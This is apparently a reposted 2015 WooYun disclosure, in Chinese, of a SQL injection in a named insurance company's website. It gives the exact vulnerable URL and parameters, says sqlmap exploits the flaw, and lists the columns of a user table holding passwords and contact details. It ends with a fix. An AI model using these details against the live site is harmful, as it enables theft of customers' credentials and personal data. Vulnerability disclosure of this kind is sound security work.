记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

中国大地保险主站SQL注射漏洞(影响用户库)

2015-04-30 23:35

注入点:

code 区域
http://ccic-net.com.cn/ebiz/view/accidentinsuranceNew/businessHistory.jsp?productCode=EID&productPlanCode=EIDWX&businessNumDetail=0&productName=%EF%BD%85%E8%A1%8C%E5%A4%A7%E5%9C%B0--%E6%97%85%E8%A1%8C%E6%97%A0%E5%BF%A7%EF%BD%85%E5%8D%A1(%E5%A2%83%E5%86%85%E7%95%85%E6%B8%B8%E5%9E%8B)



productCode,productPlanCode存在注入,其他参数未测试。



注入类型为字符bool型,支持order by,但是union的时候会断开连接,目测有一个硬件防火墙,有一点点防注入的功能。



直接用sqlmap即可利用。oracle数据库

当前库中表的数量为267个:

1.jpg



测试时没跑完,看到一个用户表NS_UESR,就暂停了。

NS_USER的列名:

code 区域
+--------------+--------------+

| Column | Type |

+--------------+--------------+

| DESCRIPTION | VARCHAR2 |

| EMAIL | VARCHAR2 |

| ENABLED | NUMBER |

| ID | NUMBER |

| LASTMODIFIED | TIMESTAMP(6) |

| MOBILE | VARCHAR2 |

| OWNER_ID | NUMBER |

| PASSWORD | VARCHAR2 |

| TELEPHONE | VARCHAR2 |

| USERNAME | VARCHAR2 |

+--------------+--------------+



泄露用户名,密码,电话,邮箱等。



仅仅看了一下列名,未查看具体数据,请悉知。

漏洞证明:

如上

修复方案:

参数化查询或过滤


知识来源: www.wooyun.org/bugs/wooyun-2015-0101650

阅读:110856 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国大地保险主站SQL注射漏洞(影响用户库)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云